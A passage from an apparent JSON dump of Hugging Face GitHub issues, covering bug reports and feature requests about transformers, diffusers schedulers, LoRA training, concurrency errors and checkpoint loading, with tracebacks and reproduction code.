Are this object's requirements defined correctly?", "body": "### System Info\n\n- torch @ https://download.pytorch.org/whl/cu124/torch-2.6.0%2Bcu124-cp310-cp310-linux_x86_64.whl\n- torchaudio @ https://download.pytorch.org/whl/cu124/torchaudio-2.6.0%2Bcu124-cp310-cp310-linux_x86_64.whl\n- torchvision @ https://download.pytorch.org/whl/cu124/torchvision-0.21.0%2Bcu124-cp310-cp310-linux_x86_64.whl\n- unsloth==2025.6.12\n- unsloth_zoo==2025.6.8\n- accelerate==1.8.1\n- bitsandbytes==0.46.0\n- pydantic==2.11.7\n- pydantic_core==2.33.2\n- tokenizers==0.21.2\n- transformers==4.52.4\n- treelite==4.4.1\n- treescope==0.1.9\n- triton==3.2.0\n- trl==0.19.0\n- xformers==0.0.29.post3\n- sympy==1.13.1\n- cut-cross-entropy==25.1.1\n- Python 3.10.16\n- NVIDIA A10G (CUDA Version: 12.5)\n- Ubuntu 24.04.2 LTS\n\n### Who can help?\n\n@ArthurZucker @itazap\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nfrom transformers import AutoTokenizer\n\n---------------------------------------------------------------------------\nModuleNotFoundError Traceback (most recent call last)\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2045](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2044), in _LazyModule.__getattr__(self, name)\n 2044 try:\n-> 2045 module = self._get_module(self._class_to_module[name])\n 2046 value = getattr(module, name)\n\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2075](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2074), in _LazyModule._get_module(self, module_name)\n 2074 except Exception as e:\n-> 2075 raise e\n\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2073](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2072), in _LazyModule._get_module(self, module_name)\n 2072 try:\n-> 2073 return importlib.import_module(\".\" + module_name, self.__name__)\n 2074 except Exception as e:\n\nFile /usr/local/lib/python3.10/importlib/__init__.py:126, in import_module(name, package)\n 125 level += 1\n--> 126 return _bootstrap._gcd_import(name[level:], package, level)\n\nFile :1050, in _gcd_import(name, package, level)\n\nFile :1027, in _find_and_load(name, import_)\n\nFile :992, in _find_and_load_unlocked(name, import_)\n\nFile :241, in _call_with_frames_removed(f, *args, **kwds)\n\nFile :1050, in _gcd_import(name, package, level)\n\nFile :1027, in _find_and_load(name, import_)\n\nFile :1004, in _find_and_load_unlocked(name, import_)\n\nModuleNotFoundError: No module named 'transformers.models.ipynb_checkpoints'\n\nThe above exception was the direct cause of the following exception:\n\nModuleNotFoundError Traceback (most recent call last)\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2045](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2044), in _LazyModule.__getattr__(self, name)\n 2044 try:\n-> 
2045 module = self._get_module(self._class_to_module[name])\n 2046 value = getattr(module, name)\n\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2075](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2074), in _LazyModule._get_module(self, module_name)\n 2074 except Exception as e:\n-> 2075 raise e\n\nFile [~/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py:2073](https://25rhl5xt9dz0f5sq.ml-c7564e33-277.cdpv2-pr.uf1v-9d9i.cloudera.site/lab/tree/project/.local/lib/python3.10/site-packages/transformers/utils/import_utils.py#line=2072), in _LazyModule._get_module(self, module_name)\n 2072 try:\n-> 2073 return importlib.import_module(\".\" + module_name, self.__name__)\n 2074 except Exception as e:\n\nFile /usr/local/lib/python3.10/importlib/__init__.py:126, in import_module(name, package)\n 125 level += 1\n--> 126 return _bootstrap._gcd_import(name[level:], package, level)\n\nFile :1050, in _gcd_import(name, package, level)\n\nFile :1027, in _find_and_load(name, import_)\n\nFile :1006, in _find_and_load_unlocked(name, i", "url": "https://github.com/huggingface/transformers/issues/40089", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-11T21:44:05Z", "updated_at": "2025-09-08T03:09:11Z", "comments": 3, "user": "octavianBordeanu" }, { "repo": "huggingface/candle", "number": 3052, "title": "Candle vs. PyTorch performance", "body": "I'm running https://github.com/huggingface/candle/tree/main/candle-examples/examples/llava vs. https://github.com/fpgaminer/joycaption/blob/main/scripts/batch-caption.py on a Mac m1.\n\nSeeing significant performance difference, Candle seems much slower.\nI enabled accelerate and metal features.\n\nWould love some pointers how to improve it.", "url": "https://github.com/huggingface/candle/issues/3052", "state": "open", "labels": [], "created_at": "2025-08-11T16:14:17Z", "updated_at": "2025-11-14T20:05:16Z", "comments": 8, "user": "ohaddahan" }, { "repo": "huggingface/diffusers", "number": 12124, "title": "For qwen-image training file, Maybe \"shuffle\" of dataloader should be \"False\" when custom_instance_prompts is not None and cache_latents is False?", "body": "### Describe the bug\n\nI think \"shuffle\" of dataloader should be \"False\" when custom_instance_prompts is not None and cache_latents is False. Otherwise, it will lead to errors in the correspondence between prompt embedding and image during training, and prompt will not be followed when performing the task of T2I.\n\n### Reproduction\n\nNone\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nNone\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12124", "state": "open", "labels": [ "bug" ], "created_at": "2025-08-11T13:15:21Z", "updated_at": "2025-08-30T01:57:02Z", "comments": 2, "user": "yinguoweiOvO" }, { "repo": "huggingface/diffusers", "number": 12120, "title": "How to train a lora with distilled flux model, such as flux-schnell???", "body": "**Is your feature request related to a problem? Please describe.**\nI can use flux as base model to train a lora, but it need 20 steps , it cost a lot of time , and I want to train a lora base on distill model to implement use fewer step make a better image, such as based on flux-schnell model train a lora it only need 4 steps can generate a good image !! 
and I could train many LoRAs like this, each generating in only 4 steps.\n\n\n\n**Describe the solution you'd like.**\nI need a script, maybe located at examples\\dreambooth\\train_dreambooth_lora_flux_schnell.py.\nI want to know how to train a LoRA based on a distilled model and get a good result. \n\n**Describe alternatives you've considered.**\nI want to train many LoRAs for a base model (flux or flux-schnell), not only one LoRA, and I want to generate with fewer steps. So I want to train LoRAs on a distilled model... how can I implement it? I tested the script [train_dreambooth_lora_flux.py](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_flux.py) by changing the base model from flux to flux-schnell, but the result is bad...\n\n**Additional context.**\nAny other implementation method is OK. ", "url": "https://github.com/huggingface/diffusers/issues/12120", "state": "open", "labels": [], "created_at": "2025-08-11T03:07:42Z", "updated_at": "2025-08-11T06:01:45Z", "user": "Johnson-yue" }, { "repo": "huggingface/diffusers", "number": 12108, "title": "Qwen Image and Chroma pipeline breaks using schedulers that enable flow matching by parameter.", "body": "### Describe the bug\n\nSeveral schedulers support flow matching by using `prediction_type=\"flow_prediction\"`, e.g.\n\n```\npipe.scheduler = UniPCMultistepScheduler(prediction_type=\"flow_prediction\", flow_shift=3.16, timestep_spacing='trailing', use_flow_sigmas=True)\n```\n\nHowever, Chroma and Qwen Image will not work with these schedulers, failing with the error\n```\nValueError: The current scheduler class 's `set_timesteps` does not support custom sigmas schedules. Please check whether you are using the correct scheduler.\n```\n\nCan we have this fixed, either by changing the schedulers to have the missing attributes and use them, or by rethinking the way these pipelines handle the timesteps?\n\n### Reproduction\n\n```py\nimport torch\nfrom diffusers import QwenImagePipeline, UniPCMultistepScheduler\n\n\n\npipe = QwenImagePipeline.from_pretrained(\"Qwen/Qwen-Image\",\n    torch_dtype=torch.bfloat16)\n#pipe.scheduler = FlowMatchEulerDiscreteScheduler(shift=3.16, use_beta_sigmas=True)\npipe.scheduler = UniPCMultistepScheduler(prediction_type=\"flow_prediction\", flow_shift=3.16, timestep_spacing='trailing', use_flow_sigmas=True)\npipe.to(\"mps\")\npipe(\"a nice picture of a rainbow\")\n```\n\n### Logs\n\n```shell\nFile \"/Volumes/SSD2TB/AI/Diffusers/qwenimagelowmem.py\", line 84, in \n image = pipe(prompt_embeds=prompt_embeds, prompt_embeds_mask=prompt_embeds_mask, \n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/Volumes/SSD2TB/AI/Diffusers/lib/python3.11/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/Volumes/SSD2TB/AI/Diffusers/lib/python3.11/site-packages/diffusers/pipelines/qwenimage/pipeline_qwenimage.py\", line 619, in __call__\n timesteps, num_inference_steps = retrieve_timesteps(\n ^^^^^^^^^^^^^^^^^^^\n File \"/Volumes/SSD2TB/AI/Diffusers/lib/python3.11/site-packages/diffusers/pipelines/qwenimage/pipeline_qwenimage.py\", line 119, in retrieve_timesteps\n raise ValueError(\nValueError: The current scheduler class 's `set_timesteps` does not support custom sigmas schedules. 
Please check whether you are using the correct scheduler.\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.35.0.dev0\n- Platform: macOS-15.5-arm64-arm-64bit\n- Running on Google Colab?: No\n- Python version: 3.11.13\n- PyTorch version (GPU?): 2.6.0 (False)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.34.3\n- Transformers version: 4.52.4\n- Accelerate version: 1.7.0\n- PEFT version: 0.17.0\n- Bitsandbytes version: not installed\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: Apple M3\n- Using GPU in script?: Yes\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12108", "state": "open", "labels": [ "bug" ], "created_at": "2025-08-09T21:34:28Z", "updated_at": "2025-08-09T21:39:30Z", "comments": 0, "user": "Vargol" }, { "repo": "huggingface/transformers", "number": 40056, "title": "Question: How to write a custom tokenizer from scratch", "body": "The guide [here](https://huggingface.co/docs/transformers/main/en/custom_models) introduces how to write a custom model and a custom model configuration. In addition, I want to create a custom tokenizer from scratch. Why?\n\nI have a multilevel transcription problem: the model takes an input utterance and outputs 12 multilingual transcripts simultaneously. So I want to design a tokenizer such that it takes all 12 languages as a dict:\n\n```python\n{\n    \"lang1\": \"text text\",\n    \"lang2\": \"text text\", \n    \"lang3\": \"text text\",\n}\n```\n\nand after tokenization\n\n\n```python\n{\n    \"input_ids\": \n    {\n        \"lang1\": \"ids of lang 1\",\n        \"lang2\": \"ids of lang 2\",\n        \"lang3\": \"ids of lang 3\",\n    }\n}\n```\n\n\nHow can I do this? I cannot find docs on building such a custom tokenizer from scratch.", "url": "https://github.com/huggingface/transformers/issues/40056", "state": "closed", "labels": [], "created_at": "2025-08-09T16:39:19Z", "updated_at": "2025-09-24T08:03:02Z", "user": "obadx" }, { "repo": "huggingface/diffusers", "number": 12107, "title": "accelerator.init_trackers error when trying with a custom object such as a list", "body": "### Describe the bug\n\nI set multiple prompts with nargs for the \"--validation_prompt\" argument in \"train_dreambooth.py\":\n\n` parser.add_argument(\n    \"--validation_prompt\",\n    type=str,\n    default=[\"A photo of sks dog in a bucket\", \"A sks cat wearing a coat\"],\n    nargs=\"*\",\n    help=\"A prompt that is used during validation to verify that the model is learning.\",\n)`\nbut an error occurred at ` if accelerator.is_main_process:\n tracker_name = 
\"dreambooth-lora\"\n accelerator.init_trackers(tracker_name, config=vars(args))` with\n\"ValueError: value should be one of int, float, str, bool, or torch.Tensor\" \n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.33.0.dev0\n- Platform: Linux-6.8.0-55-generic-x86_64-with-glibc2.39\n- Running on Google Colab?: No\n- Python version: 3.10.11\n- PyTorch version (GPU?): 2.7.1+cu126 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.30.1\n- Transformers version: 4.52.4\n- Accelerate version: 1.8.1\n- PEFT version: 0.15.2\n- Bitsandbytes version: 0.45.4\n- Safetensors version: 0.5.3\n- xFormers version: 0.0.27.post2\n- Accelerator: NVIDIA GeForce RTX 3090, 24576 MiB\n- Using GPU in script?: \n- Using distributed or parallel set-up in script?: \n\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12107", "state": "open", "labels": [ "bug" ], "created_at": "2025-08-09T10:04:06Z", "updated_at": "2025-08-09T10:04:06Z", "comments": 0, "user": "micklexqg" }, { "repo": "huggingface/diffusers", "number": 12104, "title": "IndexError: index 0 is out of bounds for dimension 0 with size 0", "body": "### Describe the bug\n\n\nWhen I test the mit-han-lab/nunchaku-flux.1-kontext-dev model, it runs normally in a non-concurrent scenario, but throws an error when I try to run it with concurrent requests.\n\nMy GPU is a single RTX 4090D.\n\nHow can I enable multi-concurrency support on a single GPU?\n\nThank you in advance for your help.\n\n\nHere is my error message:\n\n[2025-08-08 17:14:50.242] [info] Initializing QuantizedFluxModel on device 0\n[2025-08-08 17:14:50.382] [info] Loading partial weights from pytorch\n[2025-08-08 17:14:51.445] [info] Done.\nInjecting quantized module\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:00<00:00, 99.47it/s]\nLoading pipeline components...: 57%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258c | 4/7 [00:00<00:00, 28.54it/s]You set `add_prefix_space`. 
The tokenizer needs to be converted from the slow tokenizers\nLoading pipeline components...: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 7/7 [00:00<00:00, 19.02it/s]\n\nGeneration `height` and `width` have been adjusted to 752 and 1360 to fit the model requirements.\nGeneration `height` and `width` have been adjusted to 880 and 1168 to fit the model requirements.\n 43%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258e | 12/28 [00:17<00:23, 1.45s/it]\n 57%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258b | 16/28 [00:18<00:13, 1.17s/it]\n\u5904\u7406\u56fe\u50cf\u65f6\u51fa\u9519: index 29 is out of bounds for dimension 0 with size 29\n\u5904\u7406\u56fe\u50cf\u65f6\u51fa\u9519: index 29 is out of bounds for dimension 0 with size 29\n\n\n\n### Reproduction\n\n```\nimport torch\nfrom diffusers import FluxKontextPipeline\nfrom diffusers.utils import load_image\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom nunchaku import NunchakuFluxTransformer2dModel\nfrom nunchaku.utils import get_precision\nimport time\n\ndef get_result(image_path,pipeline):\n time_begin = time.time()\n image = load_image(\n image_path\n ).convert(\"RGB\")\n size = image.size\n large_now = 1440\n small_now = round(1440 * (min(size)/max(size)) /32) * 32\n width,height = (large_now,small_now) \\\n if size[0]>size[1] else (small_now,large_now)\n prompt = \"Remove the watermark from the picture\"\n image = pipeline(\n image=image,\n prompt=prompt,\n guidance_scale=2.5,\n num_inference_steps=28,\n height=height,\n width=width,\n ).images[0]\n image.save(image_path[:-4]+\"_result.png\")\n\ndef nunchaku_test(concurrency,pipeline):\n\n 
test_images = [\"\u623f\u578b\u56fe\u6c34\u5370.jpg\", \"\u5367\u5ba4\u6c34\u5370.png\"] * concurrency\n test_images = test_images[:concurrency] \n\n overall_start = time.time()\n\n with ThreadPoolExecutor(max_workers=concurrency) as executor:\n futures = [executor.submit(get_result, img_path, pipeline) for img_path in test_images]\n\n results = []\n for future in futures:\n try:\n results.append(future.result())\n except Exception as e:\n print(f\"\u5904\u7406\u56fe\u50cf\u65f6\u51fa\u9519: {e}\")\n\n overall_time = time.time() - overall_start\n\n\nif __name__ == '__main__':\n\n\n transformer = NunchakuFluxTransformer2dModel.from_pretrained(\n f\"/root/autodl-tmp/nunchaku-flux.1-kontext-dev/svdq-{get_precision()}_r32-flux.1-kontext-dev.safetensors\"\n )\n\n pipeline = FluxKontextPipeline.from_pretrained(\n \"/root/autodl-tmp/FLUX.1-Kontext-dev\", transformer=transformer, torch_dtype=torch.bfloat16\n ).to(\"cuda\")\n\n nunchaku_test(pipeline,2)\n nunchaku_test(pipeline,4)\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n~/FLUX.1-Kontext-Dev-nunchaku# diffusers-cli env\n\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\n\n- \ud83e\udd17 Diffusers version: 0.35.0.dev0\n- Platform: Linux-5.15.0-94-generic-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.12.3\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.33.1\n- Transformers version: 4.53.0\n- Accelerate version: 1.8.1\n- PEFT version: not installed\n- Bitsandbytes version: not installed\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA GeForce RTX 4090 D, 24564 MiB\n- Using GPU in script?: \n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12104", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-08T09:20:52Z", "updated_at": "2025-08-17T22:22:37Z", "comments": 1, "user": "liushiton" }, { "repo": "huggingface/datasets", "number": 7729, "title": "OSError: libcudart.so.11.0: cannot open shared object file: No such file or directory", "body": "> Hi is there any solution for that eror i try to install this one \npip install torch==1.12.1+cpu torchaudio==0.12.1+cpu -f https://download.pytorch.org/whl/torch_stable.html \nthis is working fine but tell me how to install pytorch version that is fit for gpu ", "url": "https://github.com/huggingface/datasets/issues/7729", "state": "open", "labels": [], "created_at": "2025-08-07T14:07:23Z", "updated_at": "2025-09-24T02:17:15Z", "comments": 1, "user": "SaleemMalikAI" }, { "repo": "huggingface/transformers", "number": 39992, "title": "[gpt-oss] Transform checkpoint from safetensors to state dict", "body": "Yesterday I was working on gpt-oss. However, loading the weights give me troubles.\n\u2028For models like Qwen, I did things like this:\n\n1. Create model on meta device\n2. FSDP2 shard it, so it can fit in memory\n3. On each GPU, it read weights from safetensors in a generator style, to save memory.\n4. Chunk the weights and copy to the FSDP\u2019s DTensor.\u2028\nGPT-oss does not apply this routine. Within `from_pretrained`, the mxfp4 quantizer somehow dequantized the weights, yet I cannot find a very clean way to utilize this capability. 
I had to modify the process and initialize a CPU version of the model in CPU memory.\n\nHow can we transform the safetensors to a state dict directly?", "url": "https://github.com/huggingface/transformers/issues/39992", "state": "closed", "labels": [], "created_at": "2025-08-07T13:24:06Z", "updated_at": "2025-09-15T08:02:55Z", "comments": 1, "user": "fingertap" }, { "repo": "huggingface/diffusers", "number": 12094, "title": "[Wan2.2] pipeline_wan misses the 'shift' parameter used by Wan2.2-A14B-diffusers.", "body": "**Firstly, I found that the quality of output using diffusers is poor.**\nLater, I found that pipeline_wan in diffusers[0.34.0] did not support two-stage processing. I noticed that the community had already updated it, so I installed diffusers[0.35.0-dev] from source and it worked.\n\nThen I found that the scheduler in diffusers does not support the parameter \"shift\", but \"sample_shift\" is an important generation parameter for Wan2.2, which may also lead to differences from the official inference code of Wan2.2. Therefore, the video quality may still be inferior to the original inference code.\n\nhttps://github.com/Wan-Video/Wan2.2/issues/69\n\n**What I need**\nCan the community provide UniPCMultistepScheduler and DPMSolverMultistepScheduler variants that support the 'shift' parameter? Or can pipeline_wan be adapted so that the shift parameter can be used?\n\nOr is there something wrong with my understanding? How can I correctly use the shift parameter when using diffusers?\n\nThanks!!\ncc @yiyixuxu @a-r-r-o-w \n", "url": "https://github.com/huggingface/diffusers/issues/12094", "state": "closed", "labels": [], "created_at": "2025-08-07T11:37:36Z", "updated_at": "2025-08-10T08:43:27Z", "comments": 7, "user": "yvmilir" }, { "repo": "huggingface/lerobot", "number": 1687, "title": "When using AMP to train a model, why are the saved model weights still in fp32?", "body": "\"Image\"", "url": "https://github.com/huggingface/lerobot/issues/1687", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-08-06T12:42:40Z", "updated_at": "2025-08-12T08:52:00Z", "user": "Hukongtao" }, { "repo": "huggingface/diffusers", "number": 12084, "title": "Will `cosmos-transfer1` be supported in diffusers in the future?", "body": "\nHi @a-r-r-o-w and @yiyixuxu :) \n\nFirst of all, thank you for recently enabling cosmos-predict1 models (text2world and video2world) in the diffusers library \u2014 it's super exciting to see them integrated!\n\nI was wondering if there are any plans to also support [cosmos-transfer1](https://github.com/nvidia-cosmos/cosmos-transfer1) in diffusers in the future?\n\nThanks again for your great work! \ud83d\ude4c", "url": "https://github.com/huggingface/diffusers/issues/12084", "state": "open", "labels": [], "created_at": "2025-08-06T11:22:28Z", "updated_at": "2025-08-19T12:11:33Z", "comments": 3, "user": "rebel-shshin" }, { "repo": "huggingface/lerobot", "number": 1683, "title": "SmolVLMWithExpertModel", "body": "Excuse me, I would like to know about each module. 
In this class, I would like to know how to define inputs.", "url": "https://github.com/huggingface/lerobot/issues/1683", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-08-06T10:30:21Z", "updated_at": "2025-08-12T08:52:21Z", "user": "xjushengjie" }, { "repo": "huggingface/lerobot", "number": 1674, "title": "How to train smolvla for multi-task", "body": "I have trained smolvla for aloha_sim_transfer_cube and aloha_sim_insertion, and smolvla performs well in each single task. Now I'd like to train smolvla for multi-task ---- one model can complete the two tasks above. What should I do Now? ", "url": "https://github.com/huggingface/lerobot/issues/1674", "state": "closed", "labels": [], "created_at": "2025-08-06T02:40:01Z", "updated_at": "2025-10-15T02:52:29Z", "user": "w673" }, { "repo": "huggingface/diffusers", "number": 12079, "title": "API Suggestion: Expose Methods to Convert to Sample Prediction in Schedulers", "body": "**What API design would you like to have changed or added to the library? Why?**\n\nMy proposal is for schedulers to expose `convert_to_sample_prediction` and `convert_to_prediction_type` methods, which would do the following:\n\n1. `convert_to_sample_prediction`: Converts from a given `prediction_type` to `sample_prediction` (e.g. $x_0$-prediction). This function would accept a `prediction_type` argument which defaults to `self.config.prediction_type`.\n2. `convert_to_prediction_type`: Converts back from `sample_prediction` to the scheduler's `prediction_type`. This is intended to be the inverse function of `convert_to_sample_prediction`.\n\nThe motivating use case I have in mind is to support guidance strategies such as [Adaptive Projected Guidance (APG)](https://arxiv.org/abs/2410.02416) and [Frequency-Decoupled Guidance (FDG)](https://arxiv.org/abs/2506.19713) which prefer to operate with sample / $x_0$-predictions. A code example will be given below.\n\nThe reason I think schedulers should expose these methods explicitly is that performing these operations depend on the scheduler state and definition. For example, the prediction type conversion code in `EulerDiscreteScheduler` depends on the `self.sigmas` schedule:\n\nhttps://github.com/huggingface/diffusers/blob/ba2ba9019f76fd96c532240ed07d3f98343e4041/src/diffusers/schedulers/scheduling_euler_discrete.py#L650-L663\n\nAs a possible alternative, code that uses a scheduler could instead try to infer the prediction type conversion logic from the presence of `alphas_cumprod` (for a DDPM-style conversion) or `sigmas` (for an EDM-style conversion) attributes. However, I think this is unreliable because a scheduler could use `alphas_cumprod` or `sigmas` in a non-standard way. Since schedulers essentially already implement the `convert_to_sample_prediction` logic in their `step` methods, I think it could be relatively easy to implement these methods, and calling code would not have to guess how to do the conversion.\n\nA potential difficulty is ensuring that these methods work well with the `step` method, for example if they are called outside of a denoising loop (so internal state like `self.step_index` may not be properly initialized) or if the conversion can be non-deterministic (for example, when `gamma > 0` in `EulerDiscreteScheduler`).\n\n**What use case would this enable or better enable? Can you give us a code example?**\n\nThe motivating use case is to support guidance strategies which prefer to operate with $x_0$-predictions. 
For this use case, we want to convert the denoising model prediction to `sample_prediction`, run the guider's `__call__` logic, and then convert back to the scheduler's `prediction_type` (as schedulers currently expect `model_outputs` in that `prediction_type`).\n\nThere may be other potential use cases as well that I haven't thought of.\n\nAs a concrete example, we can imagine modifying `EulerDiscreteScheduler` as follows:\n\n```python\nclass EulerDiscreteScheduler(SchedulerMixin, ConfigMixin):\n ...\n def convert_to_sample_prediction(\n self,\n model_output: torch.Tensor,\n timestep: Union[float, torch.Tensor],\n sample: torch.Tensor,\n prediction_type: Optional[str] = None,\n s_churn: float = 0.0,\n s_tmin: float = 0.0,\n s_tmax: float = float(\"inf\"),\n s_noise: float = 1.0,\n generator: Optional[torch.Generator] = None,\n ) -> torch.Tensor:\n if prediction_type is None:\n prediction_type = self.config.prediction_type\n\n # NOTE: there's a potential catch here if self.step_index isn't properly initialized\n sigma = self.sigmas[self.step_index]\n gamma = min(s_churn / (len(self.sigmas) - 1), 2**0.5 - 1) if s_tmin <= sigma <= s_tmax else 0.0\n sigma_hat = sigma * (gamma + 1)\n\n # NOTE: another potential problem is ensuring consistent computation with `step` if the conversion\n # can be non-deterministic (as below)\n if gamma > 